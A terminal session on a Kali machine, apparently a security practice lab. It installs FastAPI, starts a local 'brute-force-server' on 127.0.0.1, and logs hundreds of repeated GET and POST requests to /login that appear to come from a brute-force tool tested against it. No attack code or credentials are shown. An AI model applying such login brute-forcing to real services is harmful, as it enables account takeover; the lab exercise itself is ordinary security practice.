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12.1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whoami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└─$ mkdir brute-force-server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└─$ cd brute-force-server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└─$ python3 -m venv venv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└─$ pip3 install "fastapi[standard]"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Requirement already satisfied: fastapi[standard] in /usr/lib/python3/dist-packages (0.118.0)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Collecting starlette&lt;0.49.0,&gt;=0.40.0 (from fastapi[standard])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Downloading starlette-0.48.0-py3-none-any.whl.metadata (6.3 kB)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Requirement already satisfied: pydantic!=1.8,!=1.8.1,!=2.0.0,!=2.0.1,!=2.1.0,&lt;3.0.0,&gt;=1.7.4 in /usr/lib/python3/dist-packages (from fastapi[standard]) (2.12.5)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 already satisfied: typing-extensions&gt;=4.8.0 in /usr/lib/python3/dist-packages (from fastapi[standard]) (4.15.0)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Collecting fastapi-cli&gt;=0.0.8 (from fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard])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Downloading fastapi_cli-0.0.32-py3-none-any.whl.metadata (6.7 kB)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Requirement already satisfied: httpx&lt;1.0.0,&gt;=0.23.0 in /usr/lib/python3/dist-packages (from fastapi[standard]) (0.28.1)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Requirement already satisfied: jinja2&gt;=3.1.5 in /usr/lib/python3/dist-packages (from fastapi[standard]) (3.1.6)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Requirement already satisfied: python-multipart&gt;=0.0.18 in /usr/lib/python3/dist-packages (from fastapi[standard]) (0.0.20)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Requirement already satisfied: email-validator&gt;=2.0.0 in /usr/lib/python3/dist-packages (from fastapi[standard]) (2.2.0)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Requirement already satisfied: uvicorn&gt;=0.12.0 in /usr/lib/python3/dist-packages (from uvicorn[standard]&gt;=0.12.0; extra == "standard"-&gt;fastapi[standard]) (0.38.0)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Requirement already satisfied: anyio in /usr/lib/python3/dist-packages (from httpx&lt;1.0.0,&gt;=0.23.0-&gt;fastapi[standard]) (4.12.1)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Requirement already satisfied: certifi in /usr/lib/python3/dist-packages (from httpx&lt;1.0.0,&gt;=0.23.0-&gt;fastapi[standard]) (2026.2.25)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Requirement already satisfied: httpcore==1.* in /usr/lib/python3/dist-packages (from httpx&lt;1.0.0,&gt;=0.23.0-&gt;fastapi[standard]) (1.0.9)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Requirement already satisfied: idna in /usr/lib/python3/dist-packages (from httpx&lt;1.0.0,&gt;=0.23.0-&gt;fastapi[standard]) (3.11)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Collecting h11&gt;=0.16 (from httpcore==1.*-&gt;httpx&lt;1.0.0,&gt;=0.23.0-&gt;fastapi[standard])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Downloading h11-0.16.0-py3-none-any.whl.metadata (8.3 kB)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Requirement already satisfied: annotated-types&gt;=0.6.0 in /usr/lib/python3/dist-packages (from pydantic!=1.8,!=1.8.1,!=2.0.0,!=2.0.1,!=2.1.0,&lt;3.0.0,&gt;=1.7.4-&gt;fastapi[standard]) (0.7.0)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Requirement already satisfied: pydantic-core==2.41.5 in /usr/lib/python3/dist-packages (from pydantic!=1.8,!=1.8.1,!=2.0.0,!=2.0.1,!=2.1.0,&lt;3.0.0,&gt;=1.7.4-&gt;fastapi[standard]) (2.41.5)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Requirement already satisfied: typing-inspection&gt;=0.4.2 in /usr/lib/python3/dist-packages (from pydantic!=1.8,!=1.8.1,!=2.0.0,!=2.0.1,!=2.1.0,&lt;3.0.0,&gt;=1.7.4-&gt;fastapi[standard]) (0.4.2)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Requirement already satisfied: dnspython&gt;=2.0.0 in /usr/lib/python3/dist-packages (from email-validator&gt;=2.0.0-&gt;fastapi[standard]) (2.7.0)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Collecting typer&gt;=0.16.0 (from fastapi-cli&gt;=0.0.8-&gt;fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard])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Downloading typer-0.27.3-py3-none-any.whl.metadata (16 kB)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Collecting rich-toolkit&gt;=0.14.8 (from fastapi-cli&gt;=0.0.8-&gt;fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard])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Downloading rich_toolkit-0.20.6-py3-none-any.whl.metadata (3.0 kB)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Collecting fastapi-cloud-cli&gt;=0.1.1 (from fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard])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Downloading fastapi_cloud_cli-0.26.0-py3-none-any.whl.metadata (3.1 kB)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Collecting rignore&gt;=0.5.1 (from fastapi-cloud-cli&gt;=0.1.1-&gt;fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard])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Downloading rignore-0.8.1-cp314-cp314-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (4.2 kB)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Collecting sentry-sdk&gt;=2.20.0 (from fastapi-cloud-cli&gt;=0.1.1-&gt;fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard])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Downloading sentry_sdk-2.71.0-py3-none-any.whl.metadata (11 kB)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Collecting fastar&gt;=0.10.0 (from fastapi-cloud-cli&gt;=0.1.1-&gt;fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard])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Downloading fastar-0.12.0-cp314-cp314-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (4.1 kB)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Collecting detect-installer&gt;=0.1.0 (from fastapi-cloud-cli&gt;=0.1.1-&gt;fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard])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Downloading detect_installer-0.2.1-py3-none-any.whl.metadata (1.2 kB)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Collecting agent-detector&gt;=1.1.0 (from fastapi-cloud-cli&gt;=0.1.1-&gt;fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard])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Downloading agent_detector-2.0.0-py3-none-any.whl.metadata (6.6 kB)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Requirement already satisfied: MarkupSafe&gt;=2.0 in /usr/lib/python3/dist-packages (from jinja2&gt;=3.1.5-&gt;fastapi[standard]) (3.0.3)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Requirement already satisfied: click&gt;=8.1.7 in /usr/lib/python3/dist-packages (from rich-toolkit&gt;=0.14.8-&gt;fastapi-cli&gt;=0.0.8-&gt;fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard]) (8.1.8)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Requirement already satisfied: rich&gt;=13.7.1 in /usr/lib/python3/dist-packages (from rich-toolkit&gt;=0.14.8-&gt;fastapi-cli&gt;=0.0.8-&gt;fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard]) (13.9.4)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Requirement already satisfied: markdown-it-py&gt;=2.2.0 in /usr/lib/python3/dist-packages (from rich&gt;=13.7.1-&gt;rich-toolkit&gt;=0.14.8-&gt;fastapi-cli&gt;=0.0.8-&gt;fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard]) (3.0.0)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Requirement already satisfied: pygments&lt;3.0.0,&gt;=2.13.0 in /usr/lib/python3/dist-packages (from rich&gt;=13.7.1-&gt;rich-toolkit&gt;=0.14.8-&gt;fastapi-cli&gt;=0.0.8-&gt;fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard]) (2.19.2)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Requirement already satisfied: mdurl~=0.1 in /usr/lib/python3/dist-packages (from markdown-it-py&gt;=2.2.0-&gt;rich&gt;=13.7.1-&gt;rich-toolkit&gt;=0.14.8-&gt;fastapi-cli&gt;=0.0.8-&gt;fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard]) (0.1.2)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Requirement already satisfied: urllib3&gt;=1.26.11 in /usr/lib/python3/dist-packages (from sentry-sdk&gt;=2.20.0-&gt;fastapi-cloud-cli&gt;=0.1.1-&gt;fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard]) (2.6.3)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Collecting shellingham&gt;=1.3.0 (from typer&gt;=0.16.0-&gt;fastapi-cli&gt;=0.0.8-&gt;fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard])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Downloading shellingham-1.5.4-py2.py3-none-any.whl.metadata (3.5 kB)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Collecting annotated-doc&gt;=0.0.2 (from typer&gt;=0.16.0-&gt;fastapi-cli&gt;=0.0.8-&gt;fastapi-cli[standard]&gt;=0.0.8; extra == "standard"-&gt;fastapi[standard])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Downloading annotated_doc-0.0.5-py3-none-any.whl.metadata (6.5 kB)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Collecting httptools&gt;=0.6.3 (from uvicorn[standard]&gt;=0.12.0; extra == "standard"-&gt;fastapi[standard])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Downloading httptools-0.9.0-cp314-cp314-manylinux1_x86_64.manylinux_2_28_x86_64.manylinux_2_5_x86_64.whl.metadata (3.5 kB)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Requirement already satisfied: python-dotenv&gt;=0.13 in /usr/lib/python3/dist-packages (from uvicorn[standard]&gt;=0.12.0; extra == "standard"-&gt;fastapi[standard]) (1.0.1)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Requirement already satisfied: pyyaml&gt;=5.1 in /usr/lib/python3/dist-packages (from uvicorn[standard]&gt;=0.12.0; extra == "standard"-&gt;fastapi[standard]) (6.0.3)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Requirement already satisfied: uvloop&gt;=0.15.1 in /usr/lib/python3/dist-packages (from uvicorn[standard]&gt;=0.12.0; extra == "standard"-&gt;fastapi[standard]) (0.22.1)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Collecting watchfiles&gt;=0.13 (from uvicorn[standard]&gt;=0.12.0; extra == "standard"-&gt;fastapi[standard])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Downloading watchfiles-1.3.0-cp310-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (4.9 kB)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Requirement already satisfied: websockets&gt;=10.4 in /usr/lib/python3/dist-packages (from uvicorn[standard]&gt;=0.12.0; extra == "standard"-&gt;fastapi[standard]) (15.0.1)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Downloading starlette-0.48.0-py3-none-any.whl (73 kB)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Downloading fastapi_cli-0.0.32-py3-none-any.whl (14 kB)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Downloading fastapi_cloud_cli-0.26.0-py3-none-any.whl (108 kB)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Downloading agent_detector-2.0.0-py3-none-any.whl (9.4 kB)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Downloading detect_installer-0.2.1-py3-none-any.whl (5.4 kB)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Downloading fastar-0.12.0-cp314-cp314-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (809 kB)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━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 809.6/809.6 kB 743.2 kB/s  0:00:01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Downloading h11-0.16.0-py3-none-any.whl (37 kB)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Downloading rich_toolkit-0.20.6-py3-none-any.whl (39 kB)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Downloading rignore-0.8.1-cp314-cp314-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (929 kB)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━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 929.3/929.3 kB 1.4 MB/s  0:00:00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Downloading sentry_sdk-2.71.0-py3-none-any.whl (534 kB)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━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 534.3/534.3 kB 1.0 MB/s  0:00:00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Downloading typer-0.27.3-py3-none-any.whl (123 kB)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Downloading annotated_doc-0.0.5-py3-none-any.whl (5.3 kB)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Downloading shellingham-1.5.4-py2.py3-none-any.whl (9.8 kB)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Downloading httptools-0.9.0-cp314-cp314-manylinux1_x86_64.manylinux_2_28_x86_64.manylinux_2_5_x86_64.whl (514 kB)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Downloading watchfiles-1.3.0-cp310-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (458 kB)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Installing collected packages: shellingham, sentry-sdk, rignore, httptools, h11, fastar, detect-installer, annotated-doc, agent-detector, watchfiles, starlette, typer, rich-toolkit, fastapi-cloud-cli, fastapi-cli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ERROR: pip's dependency resolver does not currently take into account all the packages that are installed. This behaviour is the source of the following dependency conflicts.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netexec 1.5.1 requires aardwolf&gt;=0.2.8, which is not installed.                                                                 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netexec 1.5.1 requires bloodhound-ce&gt;=1.8.0, which is not installed.                                          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netexec 1.5.1 requires jwt&gt;=1.3.1, which is not installed.                                                      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mitmproxy 12.2.3 requires mitmproxy_rs&lt;0.13,&gt;=0.12.6, which is not installed.                                       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theharvester 4.10.1 requires aiohttp-socks==0.11.0, but you have aiohttp-socks 0.10.1 which is incompatible.        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theharvester 4.10.1 requires aiomultiprocess==0.9.1, but you have aiomultiprocess 0.9.0 which is incompatible.  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theharvester 4.10.1 requires aiosqlite==0.22.1, but you have aiosqlite 0.21.0 which is incompatible.            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theharvester 4.10.1 requires certifi==2026.1.4, but you have certifi 2026.2.25 which is incompatible.                      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theharvester 4.10.1 requires dnspython==2.8.0, but you have dnspython 2.7.0 which is incompatible.                     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theharvester 4.10.1 requires fastapi==0.129.2, but you have fastapi 0.118.0 which is incompatible.             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theharvester 4.10.1 requires playwright==1.58.0, but you have playwright 1.55.0+ds which is incompatible.                  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theharvester 4.10.1 requires python-dateutil==2.9.0.post0, but you have python-dateutil 2.9.0 which is incompatible.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theharvester 4.10.1 requires slowapi==0.1.9, but you have slowapi 0.1.4 which is incompatible.   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theharvester 4.10.1 requires uvicorn==0.41.0, but you have uvicorn 0.38.0 which is incompatible. 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certipy-ad 5.0.4 requires pycryptodomex&gt;=3.22.0, but you have pycryptodomex 3.20.0 which is incompatible.             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Successfully installed agent-detector-2.0.0 annotated-doc-0.0.5 detect-installer-0.2.1 fastapi-cli-0.0.32 fastapi-cloud-cli-0.26.0 fastar-0.12.0 h11-0.16.0 httptools-0.9.0 rich-toolkit-0.20.6 rignore-0.8.1 sentry-sdk-2.71.0 shellingham-1.5.4 starlette-0.48.0 typer-0.27.3 watchfiles-1.3.0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└─$ nano main.py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└─$ fastapi dev main.py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⚡️ Starting FastAPI in development mode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🐍 Using import string: main:app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🌐 Server started at http://127.0.0.1:8000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Documentation at http://127.0.0.1:8000/docs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Logs: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▕  Will watch for changes in these directories: ['/home/kali/brute-force-server']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▕  Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)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▕  Started reloader process [10070] using WatchFiles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▕  Started server process [10144]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▕  Waiting for application startup.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▕  Application startup complete.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▕  127.0.0.1:35158 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35172 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35188 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35194 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35218 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35222 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35258 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35208 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35290 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35302 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35198 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35266 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35318 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35242 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35274 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35226 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35334 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35346 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35348 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35366 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35364 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35370 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35378 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35402 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35390 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35412 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35428 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35444 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35460 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35476 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35492 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35508 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35512 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35524 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35514 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35520 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35538 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35554 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35566 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35558 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35582 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35612 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35594 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35598 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35618 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35616 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35630 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35646 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35648 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35682 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35664 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35666 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35696 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35710 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35722 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35724 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35754 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35744 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35768 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35780 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35776 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35784 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35792 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35786 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35798 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35834 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35818 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35802 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35824 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35836 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35872 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35870 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35840 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35842 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35882 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35896 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35900 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35926 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35916 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35930 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:35932 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35942 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35970 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35956 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35960 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35972 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35996 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:35988 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36002 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36004 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36018 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36022 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36030 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36032 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36050 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36042 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36066 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36080 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36100 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36098 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36088 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36114 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36118 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36124 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36132 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36154 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36138 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36168 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36170 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36174 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36188 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36198 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36208 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36220 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36246 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36230 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36252 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36256 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36278 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36272 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36282 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36292 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36300 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36302 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36308 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36318 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36316 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36344 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36348 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36354 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36362 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36366 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36370 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36372 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36388 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36396 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36412 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36426 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36432 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36444 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36460 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36470 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36486 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36504 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36502 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36520 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36524 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36550 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36536 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36526 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36562 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36552 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36560 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36578 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36592 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36610 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36600 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36622 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36650 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36634 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36664 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36666 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36670 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36676 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36688 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36696 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36706 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36744 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36728 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36754 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36716 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36760 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36770 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36780 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36774 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36796 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36812 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36804 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36828 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36844 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36846 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36850 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36860 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36894 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36884 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36876 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36924 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36906 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36896 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36908 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36958 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36936 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36948 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36966 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:36980 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:36990 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37006 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37012 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37016 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37028 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37036 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37040 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37044 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37042 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37058 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37070 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37082 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37094 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37114 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37098 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37118 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37132 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37138 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37144 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37158 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37180 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37174 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37190 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37210 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37198 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37224 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37240 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37256 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37268 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37282 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37292 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37304 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37308 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37320 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37332 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37340 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37356 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37366 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37372 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37378 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37392 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37406 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37410 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37422 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37428 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37438 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37458 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37446 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37466 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37470 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37482 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37474 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37498 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37504 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37506 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37510 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37520 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37536 - "GET /login HTTP/1.0" 405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▕  127.0.0.1:37562 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37550 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37574 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37582 - "POST /login HTTP/1.0" 200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▕  127.0.0.1:37596 - "POST /login HTTP/1.0" 200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▕  